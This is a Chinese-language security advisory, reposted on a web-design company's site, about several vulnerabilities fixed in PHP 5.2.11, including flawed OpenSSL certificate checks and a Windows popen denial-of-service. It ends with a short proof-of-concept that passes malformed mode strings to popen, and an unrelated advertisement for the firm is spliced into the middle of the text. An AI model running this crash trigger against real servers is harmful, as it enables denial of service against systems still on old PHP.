新聞中心
PHP是廣泛使用的通用目的腳本語(yǔ)言,特別適合于Web開(kāi)發(fā),可嵌入到HTML中。PHP的5.2.11之前版本的多個(gè)函數(shù)中存在安全漏洞,可能允許遠(yuǎn)程攻擊者導(dǎo)致拒絕服務(wù)或完全入侵用戶系統(tǒng)。

創(chuàng)新互聯(lián)是一家專注于成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作與策劃設(shè)計(jì),勐海網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)做網(wǎng)站,專注于網(wǎng)站建設(shè)10多年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:勐海等地區(qū)。勐海做網(wǎng)站價(jià)格咨詢:028-86922220
1) PHP的php_openssl_apply_verification_policy函數(shù)沒(méi)有正確的執(zhí)行證書(shū)驗(yàn)證,可能允許攻擊者通過(guò)偽造的證書(shū)執(zhí)行欺騙攻擊。
2) imagecolortransparent函數(shù)沒(méi)有正確的對(duì)顏色索引執(zhí)行過(guò)濾檢查。
3) 當(dāng)運(yùn)行在某些Windows操作系統(tǒng)上時(shí),TSRM/tsrm_win32.c文件中的popen API函數(shù)允許攻擊者通過(guò)第二個(gè)參數(shù)中的特制e或er字符串導(dǎo)致拒絕服務(wù)。
<*參考
http://secunia.com/advisories/36791
http://bugs.php.net/bug.php?id=44683
*>
測(cè)試方法:
[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!
$t1 = popen("echo hello", "e");
pclose($t1);
$t2 = popen("echo hello", "re");
pclose($t2);
$t3 = popen("echo hello", "er");
pclose($t3);
?>
新聞名稱:PHP 5.2.11版本修復(fù)多個(gè)安全漏洞
轉(zhuǎn)載來(lái)于:http://www.dlmjj.cn/article/coohjje.html


咨詢
建站咨詢
